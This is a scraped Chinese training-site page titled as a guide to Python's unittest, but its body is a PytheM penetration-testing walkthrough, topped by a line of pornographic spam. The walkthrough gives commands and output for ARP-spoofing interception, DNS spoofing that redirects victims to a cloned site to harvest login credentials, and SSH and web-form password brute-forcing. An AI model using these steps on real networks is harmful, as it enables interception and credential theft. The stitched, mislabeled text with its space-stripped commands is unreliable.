国产睡熟迷奷白丝护士系列精品,中文色字幕网站,免费h网站在线观看的,亚洲开心激情在线

      <sup id="hb9fh"></sup>
          1. 千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機構(gòu)

            手機站
            千鋒教育

            千鋒學習站 | 隨時隨地免費學

            千鋒教育

            掃一掃進入千鋒手機站

            領(lǐng)取全套視頻
            千鋒教育

            關(guān)注千鋒學習站小程序
            隨時隨地免費學習課程

            當前位置:首頁  >  技術(shù)干貨  > Python的Unittest單元測試使用詳解

            Python的Unittest單元測試使用詳解

            來源:千鋒教育
            發(fā)布人:xqq
            時間: 2023-11-06 21:21:54 1699276914

            PytheM是一個Python滲透測試框架。它只能在osnGNU/LinuxOS系統(tǒng)上運行。

            安裝

            $sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

            運行

            $sudo./pythem

            例子

            ARP欺騙-HTTP中間人攻擊

            命令:

            pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

            ARP+DNS欺騙-重定向到偽造的頁面,收集登錄憑證

            使用SET等克隆工具克隆你選中的網(wǎng)站,并部署在Apache2上

            命令:

            pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

            SSH暴破-暴力破解

            pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

            Web頁面參數(shù)暴力破解

            首先獲取web頁面登錄時的參數(shù)格式id=value

            顯示重定向頁面,如果定向到一個不同的頁面則說明猜解正確。

            命令

            pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

            URL內(nèi)容爆破

            pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

            功能

            [PytheM–PenetrationTestingFrameworkv0.3.2]

            help:

            打印幫助信息。

            exit/quit:

            退出程序。

            set:

            設(shè)置變量的值,參數(shù):

            interface

            gateway

            target

            file

            arpmode例子:

            pythem>setinterface|openinputtoset

            或者

            pythem>setinterfacewlan0|don'topeninputtosetvalue

            print:

            打印變量的值,例子:

            pythem>printgateway

            scan:

            進行tcp/manualport/arp掃描.

            (應(yīng)該在設(shè)置完網(wǎng)卡和目標后再調(diào)用)例子:

            pythem>scan

            或者

            pythem>scantcp

            arpspoof:

            開始或結(jié)束arpspoofing攻擊.(使用rep或req可以設(shè)置arp欺騙的模式,rep表示欺騙響應(yīng),req表示欺騙請求)

            參數(shù)

            start

            stop

            例子:

            arpspoofstartarpspoofstop

            dnsspoof:

            開始dnsspoofing攻擊.(應(yīng)該在arp欺騙攻擊開始后再調(diào)用)例子:

            pythem>dnsspoofstartpythem>dnsspoofstop

            sniff:

            開始嗅探數(shù)據(jù)包(應(yīng)該在設(shè)置網(wǎng)卡后再調(diào)用)例子:

            pythem>sniffhttp

            或者

            pythem>sniff

            [+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

            pforensic:

            開始分析數(shù)據(jù)包(應(yīng)該在設(shè)置完網(wǎng)卡和.pcap文件后調(diào)用)例子:

            pythem>pforensicpforensic>help

            brute-force:

            開始暴力破解攻擊(應(yīng)該在設(shè)置完目標和字典文件路徑后調(diào)用)參數(shù):

            ssh|目標是IP地址ipaddressastargeturl|目標是url(包含http://或https://)webform|目標是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

            geoip:

            顯示IP地址的大概位置(應(yīng)該在設(shè)置目標(IP地址)后再調(diào)用)例子:

            pythem>geoip

            或者

            pythem>geoip8.8.8.8

            decodeandencode:

            以選擇的模式解碼和編碼字符串,例子:

            pythem>decodebase64pythem>encodeascii

            cookiedecode:

            解碼base64url編碼的cookie的值,例子:

            pythem>cookiedecode

            其它在控制臺可以執(zhí)行的命令,比如cd,ls,nano,cat等。

            Jarvis–聲音控制助手

            [*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以語音識

            以上內(nèi)容為大家介紹了Python的Unittest單元測試使用詳解,希望對大家有所幫助,如果想要了解更多Python相關(guān)知識,請關(guān)注IT培訓機構(gòu):千鋒教育。http://www.parentadvocate.org/

            tags: python培訓
            聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。
            10年以上業(yè)內(nèi)強師集結(jié),手把手帶你蛻變精英
            請您保持通訊暢通,專屬學習老師24小時內(nèi)將與您1V1溝通
            免費領(lǐng)取
            今日已有369人領(lǐng)取成功
            劉同學 138****2860 剛剛成功領(lǐng)取
            王同學 131****2015 剛剛成功領(lǐng)取
            張同學 133****4652 剛剛成功領(lǐng)取
            李同學 135****8607 剛剛成功領(lǐng)取
            楊同學 132****5667 剛剛成功領(lǐng)取
            岳同學 134****6652 剛剛成功領(lǐng)取
            梁同學 157****2950 剛剛成功領(lǐng)取
            劉同學 189****1015 剛剛成功領(lǐng)取
            張同學 155****4678 剛剛成功領(lǐng)取
            鄒同學 139****2907 剛剛成功領(lǐng)取
            董同學 138****2867 剛剛成功領(lǐng)取
            周同學 136****3602 剛剛成功領(lǐng)取
            相關(guān)推薦HOT